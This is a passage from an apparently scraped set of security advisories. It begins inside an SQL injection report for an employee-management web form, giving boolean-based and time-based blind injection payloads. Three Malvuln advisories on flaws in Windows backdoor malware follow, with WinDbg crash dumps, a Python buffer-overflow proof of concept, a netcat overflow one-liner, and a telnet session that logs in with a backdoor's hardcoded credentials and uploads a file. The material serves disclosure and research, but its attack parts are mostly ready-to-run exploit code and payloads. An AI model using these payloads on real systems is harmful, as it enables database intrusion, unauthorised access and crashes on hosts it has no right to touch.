form-data; name="middlename"<br /><br />Z<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="lastname"<br /><br />Cooper<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="gender"<br /><br />Male<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="department"<br /><br />IT Department<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="position"<br /><br />Department Manager<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="email"<br /><br />mcooper@sample.com<br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="password"<br /><br /><br />------WebKitFormBoundary39q8yel1pdwYRLNz<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundary39q8yel1pdwYRLNz--<br /><br /><br /><br /><br />==========================<br /><br />#Payloads<br />#++++++++++++<br />#Payload: (Boolean-Based Blind)<br /><br />#------WebKitFormBoundary39q8yel1pdwYRLNz<br />#Content-Disposition: form-data; name="id"<br /><br />#4' or 1=1 --<br /><br />#--------<br /><br />#Payload: (time-based blind)<br /><br />#------WebKitFormBoundary39q8yel1pdwYRLNz<br />#Content-Disposition: form-data; name="id"<br /><br />#4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test<br /><br />#-------<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/694d21679cc212c59515584d1b65dc84.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.BlueAdept.02.a<br />Vulnerability: Remote Buffer Overflow<br />Description: The malware listens on TCP port 6969, after connecting to the infected host TCP ports 6970, 6971 are then opened. The newly opened port 6970 is vulnerable allowing third party attackers who can reach an infected host ability to trigger a buffer overflow overwriting EAX, ECX and EDX registers.<br />Type: PE32<br />MD5: 694d21679cc212c59515584d1b65dc84<br />Vuln ID: MVID-2021-0408<br />Dropped files: <br />ASLR: False<br />DEP: False<br />Safe SEH: True<br />Disclosure: 11/21/2021<br /><br />Memory Dump:<br />(1a34.157c): Access violation - code c0000005 (first/second chance not available)<br />eax=41414141 ebx=04213858 ecx=41414141 edx=41414141 esi=00000014 edi=0045e610<br />eip=00401c62 esp=000a141c ebp=0045e614 iopl=0 nv up ei pl nz na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206<br />*** WARNING: Unable to verify checksum for Backdoor.Win32.BlueAdept.02.a.694d21679cc212c59515584d1b65dc84.exe<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.BlueAdept.02.a.694d21679cc212c59515584d1b65dc84.exe<br />Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+0x1c62:<br />00401c62 8902 mov dword ptr [edx],eax ds:002b:41414141=????????<br /><br />0:000> .ecxr<br />eax=41414141 ebx=04213858 ecx=41414141 edx=41414141 esi=00000014 edi=0045e610<br />eip=00401c62 esp=000a141c ebp=0045e614 iopl=0 nv up ei pl nz na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206<br />Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+0x1c62:<br />00401c62 8902 mov dword ptr [edx],eax ds:002b:41414141=????????<br /><br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br /><br />FAULTING_IP: <br />Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+1c62<br />00401c62 8902 mov dword ptr [edx],eax<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 00401c62 (Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+0x00001c62)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000001<br /> Parameter[1]: 41414141<br />Attempt to write to address 41414141<br /><br />PROCESS_NAME: Backdoor.Win32.BlueAdept.02.a.694d21679cc212c59515584d1b65dc84.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000001<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />WRITE_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+1c62<br />00401c62 8902 mov dword ptr [edx],eax<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 0000157c<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />IP_ON_HEAP: 0423fffc<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />FRAME_ONE_INVALID: 1<br /><br />LAST_CONTROL_TRANSFER: from 0423fffc to 00401c62<br /><br />STACK_TEXT: <br />WARNING: Stack unwind information not available. Following frames may be wrong.<br />0045e614 0423fffc 02563ae8 02561754 02561774 Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+0x1c62<br />00000000 00000000 00000000 00000000 00000000 0x423fffc<br /><br /><br />SYMBOL_STACK_INDEX: 0<br /><br />SYMBOL_NAME: Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+1c62<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84<br /><br />IMAGE_NAME: Backdoor.Win32.BlueAdept.02.a.694d21679cc212c59515584d1b65dc84.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19<br /><br />STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb<br /><br />FAILURE_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.BlueAdept.02.a.694d21679cc212c59515584d1b65dc84.exe!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141_Backdoor_Win32_BlueAdept_02_a_694d21679cc212c59515584d1b65dc84+1c62<br /><br /><br />Exploit/PoC:<br />from socket import *<br />import time<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=6969<br />PORT2=6970 #vuln port<br /><br />def doit():<br /><br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /> time.sleep(1)<br /> print("[+] Opened vulnerable port!")<br /> s.close()<br /> <br /> PAYLOAD="TRACE /"+"A"*17558+ " HTTP/1.1\r\n\r\n"<br /><br /> s2=socket(AF_INET, SOCK_STREAM)<br /> s2.connect((MALWARE_HOST, PORT2))<br /><br /> print("[+] Sending malicious packets!")<br /> <br /> for i in range(0, 10):<br /> s2.send(PAYLOAD)<br /> time.sleep(0.2)<br /> <br /> s2.close()<br /><br /><br />if __name__=="__main__":<br /> doit()<br /> print("Malvuln")<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/fc100ff65f676a26293915407adc211c.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP.Lana.01.d<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on TCP port 6666. The credentials "user" and "pass" are weak and stored in plaintext with the executable.<br />Type: PE32<br />MD5: fc100ff65f676a26293915407adc211c<br />Vuln ID: MVID-2022-0468<br />Dropped files: FTP.exe<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />.text:00402C08 push offset aUser ; "user"<br />.text:00402C0D push eax ; lpString1<br />.text:00402C0E call lstrcmpiA<br />.text:00402C13 or eax, eax<br /><br /><br />.text:00402C71 jz short loc_402CB0<br />.text:00402C73 mov eax, [ebp+lpString1]<br />.text:00402C76 add eax, 5<br />.text:00402C79 push offset aPass ; "pass"<br /><br /><br />telnet.exe x.x.x.x 6666<br />220 Anal FTP v0.1 <br />USER user <br />331 Password required for user. <br />PASS pass <br />230 User logged in, proceed. <br />SYST <br />215 UNIX Type: L8 <br />PASV <br />227 Entering Passive Mode (192,168,18,129,225,245). <br />STOR DOOM.exe <br />150 Data connection accepted. <br />226 Transfer ok <br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/a8818da39c7d36d9b5497d1a875798b8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.BNLite<br />Vulnerability: Remote Heap Based Buffer Overflow<br />Description: The malware listens on TCP port 5000. Third party attackers who can reach the system can send a specially crafted payload to trigger a heap based buffer overflow overwriting the ECX, EDX registers and corrupting memory located on the heap.<br />Type: PE32<br />MD5: a8818da39c7d36d9b5497d1a875798b8<br />Vuln ID: MVID-2021-0407<br />Dropped files: procmon.exe<br />ASLR: False<br />DEP: False<br />Safe SEH: True<br />Disclosure: 11/21/2021<br /><br />Memory Dump:<br />(1578.f54): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=41414141 edx=41414141 esi=00000003 edi=00000003<br />eip=7770ed3c esp=0019f3b4 ebp=0019f544 iopl=0 nv up ei pl nz na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />7770ed3c c21400 ret 14h<br /><br />0:000> .ecxr<br />eax=00004141 ebx=02477958 ecx=41414141 edx=41414141 esi=02477960 edi=02430000<br />eip=776e2d6a esp=0019fcf0 ebp=0019feb0 iopl=0 nv up ei pl nz ac po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212<br />ntdll!RtlpAllocateHeap+0x37a:<br />776e2d6a 8b09 mov ecx,dword ptr [ecx] ds:002b:41414141=????????<br /><br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for procmon.exe<br />*** ERROR: Module load completed but symbols could not be loaded for procmon.exe<br />Failed calling InternetOpenUrl, GLE=12029<br /><br />FAULTING_IP: <br />ntdll!RtlpAllocateHeap+37a<br />776e2d6a 8b09 mov ecx,dword ptr [ecx]<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 776e2d6a (ntdll!RtlpAllocateHeap+0x0000037a)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 41414141<br />Attempt to read from address 41414141<br /><br />PROCESS_NAME: procmon.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000000<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />READ_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />procmon+1966<br />00401966 a3c6304000 mov dword ptr [procmon+0x30c6 (004030c6)],eax<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 00000f54<br /><br />BUGCHECK_STR: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_buffer_overrun_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: ACTIONABLE_HEAP_CORRUPTION_heap_failure_buffer_overrun_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_buffer_overrun_FILL_PATTERN_41414141<br /><br />LAST_CONTROL_TRANSFER: from 776e16b7 to 776e2d6a<br /><br />STACK_TEXT: <br />0019feb0 776e16b7 00000449 00000458 02439328 ntdll!RtlpAllocateHeap+0x37a<br />0019ff00 776e13ee 00100008 00000000 00000000 ntdll!RtlpAllocateHeapInternal+0x2b7<br />0019ff18 74a10cd4 02430000 00100008 00000449 ntdll!RtlAllocateHeap+0x3e<br />0019ff68 00401966 00000040 00000449 0019ff94 KERNELBASE!GlobalAlloc+0x64<br />WARNING: Stack unwind information not available. Following frames may be wrong.<br />0019ff78 0040125b 0000037c 77408654 00326000 procmon+0x1966<br />0019ff94 77704a77 00326000 1cd497cc 00000000 procmon+0x125b<br />0019ffdc 77704a47 ffffffff 77729eb4 00000000 ntdll!__RtlUserThreadStart+0x2f<br />0019ffec 00000000 00401000 00326000 00000000 ntdll!_RtlUserThreadStart+0x1b<br /><br /><br />STACK_COMMAND: !heap ; ~0s; .ecxr ; kb<br /><br />SYMBOL_STACK_INDEX: 4<br /><br />SYMBOL_NAME: procmon+1966<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: procmon<br /><br />IMAGE_NAME: procmon.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 3aa07951<br /><br />FAILURE_BUCKET_ID: ACTIONABLE_HEAP_CORRUPTION_heap_failure_buffer_overrun_FILL_PATTERN_41414141_c0000005_procmon.exe!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_buffer_overrun_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_procmon+1966<br /><br /><br />Exploit/PoC:<br />python -c "print('GET /'+'A'*10000+' HTTP/1.1\r\n\r\n')" | nc64.exe x.x.x.x 5000<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>